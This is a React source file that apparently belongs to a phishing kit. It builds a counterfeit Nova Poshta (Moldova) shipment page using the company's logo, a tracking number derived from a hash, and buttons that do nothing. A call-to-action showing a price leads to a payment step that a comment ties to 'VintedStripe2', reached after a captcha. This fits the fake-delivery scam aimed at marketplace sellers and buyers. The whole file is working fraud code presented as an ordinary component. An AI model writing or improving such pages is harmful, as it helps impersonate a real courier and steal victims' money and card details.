import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './NovaPoshtaMdSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { API_URL } from '../apiBase';
import { novaPoshtaMdSuccessCopy as c } from '../novaPoshtaMdSuccessCopy';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/nova-poshta-md-logo.png`;
const FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/nova-poshta-md-footer.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function trackingFromCode(pageCode) {
  if (!pageCode) return '—';
  let h = 0;
  for (let i = 0; i < pageCode.length; i += 1) h = (h * 33 + pageCode.charCodeAt(i)) >>> 0;
  const alphabet = 'qIxQxNOFmXJdgAyp';
  let out = '';
  let n = h || 1;
  for (let i = 0; i < 14; i += 1) {
    out += alphabet[n % alphabet.length];
    n = (n * 1103515245 + 12345) >>> 0;
  }
  return out;
}

/** Nova Poshta (MD) — после капчи → index2 (VintedStripe2). */
function NovaPoshtaMdSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'MD').toUpperCase();

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const amountText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(Math.round(priceNumber))
        : String(priceNumber);
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const trackingId = useMemo(() => trackingFromCode(pageCode || pageData?.page_code || ''), [pageCode, pageData?.page_code]);

  const copyTracking = () => {
    if (!trackingId || trackingId === '—') return;
    if (typeof navigator !== 'undefined' && navigator.clipboard?.writeText) {
      navigator.clipboard.writeText(trackingId).catch(() => {});
    }
  };

  const fullName = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const description = (pageData?.product_name || '').trim() || '—';

  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);

  if (loading && pageCode) {
    return (
      <div className="npmd-wrap">
        <div className="npmd-loading">{c.loading}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="npmd-wrap">
      <header className="npmd-header">
        <div className="npmd-header-inner">
          <a href="#/" className="npmd-brand" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="NOVA POSHTA" className="npmd-brand-img" decoding="async" />
          </a>
        </div>
      </header>

      <main className="npmd-main">
        <div className="npmd-main-inner">
          <nav className="npmd-breadcrumb" aria-label="Breadcrumb">
            <span className="npmd-bc-item">{c.breadcrumbHome}</span>
            <span className="npmd-bc-sep">/</span>
            <span className="npmd-bc-item">{c.breadcrumbServices}</span>
            <span className="npmd-bc-sep">/</span>
            <span className="npmd-bc-current">{c.breadcrumbCurrent}</span>
          </nav>
          <h1 className="npmd-h1">{c.title}</h1>

          <section className="npmd-card" aria-label="Tracking">
            <div className="npmd-track-row">
              <div>
                <div className="npmd-muted">{c.trackingLabel}</div>
                <div className="npmd-track-id">{trackingId}</div>
              </div>
              <div className="npmd-track-actions">
                <button type="button" className="npmd-track-btn" onClick={(e) => e.preventDefault()}>
                  {c.track}
                </button>
                <button type="button" className="npmd-track-btn npmd-track-btn--ghost" onClick={(e) => e.preventDefault()}>
                  {c.help}
                </button>
                <button type="button" className="npmd-copy" onClick={(e) => { e.preventDefault(); copyTracking(); }}>
                  <span className="npmd-copy-ico" aria-hidden />
                  <span>{c.copy}</span>
                </button>
              </div>
            </div>
          </section>

          <section className="npmd-card">
            <h2 className="npmd-section-title">{c.statusTitle}</h2>
            <div className="npmd-status">
              <div className="npmd-status-item">
                <span className="npmd-status-ico" aria-hidden />
                <span>{c.statusLine1}</span>
              </div>
              <div className="npmd-status-item">
                <span className="npmd-status-ico npmd-status-ico--red" aria-hidden />
                <span>{c.statusLine2}</span>
              </div>
            </div>
            <Link to={index2Path} className="npmd-cta-wrap">
              <button type="button" className="npmd-cta">
                {c.cta} {amountText === '—' ? '' : amountText}
              </button>
            </Link>
          </section>

          <section className="npmd-card">
            <h2 className="npmd-section-title">{c.deliveryInfoTitle}</h2>
            <div className="npmd-grid">
              <div>
                <div className="npmd-k">{c.recipientInfo}</div>
                <div className="npmd-v">{fullName}</div>
                <div className="npmd-v" style={{ marginTop: 6 }}>{address}</div>
              </div>
              <div>
                <div className="npmd-k">{c.characteristics}</div>
                <div className="npmd-v">{c.characteristicsValue}</div>
              </div>
              <div>
                <div className="npmd-k">{c.description}</div>
                <div className="npmd-v">{description}</div>
              </div>
              <div>
                <div className="npmd-k">{c.productImage}</div>
                {showPhoto ? (
                  <img
                    src={photoSrc}
                    alt=""
                    className="npmd-photo"
                    onError={() => setImgFailed(true)}
                    decoding="async"
                  />
                ) : (
                  <div className="npmd-photo" aria-hidden />
                )}
              </div>
            </div>
          </section>

          <section className="npmd-help">
            <h3>{c.needHelpTitle}</h3>
            <p>{c.needHelpBody}</p>
            <button type="button" className="npmd-help-btn" onClick={(e) => e.preventDefault()}>
              {c.helpBtn}
            </button>
          </section>
        </div>
      </main>

      <footer className="npmd-footer">
        <img src={FOOTER_SRC} alt="" className="npmd-footer-img" width={1024} height={284} decoding="async" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default NovaPoshtaMdSuccess;

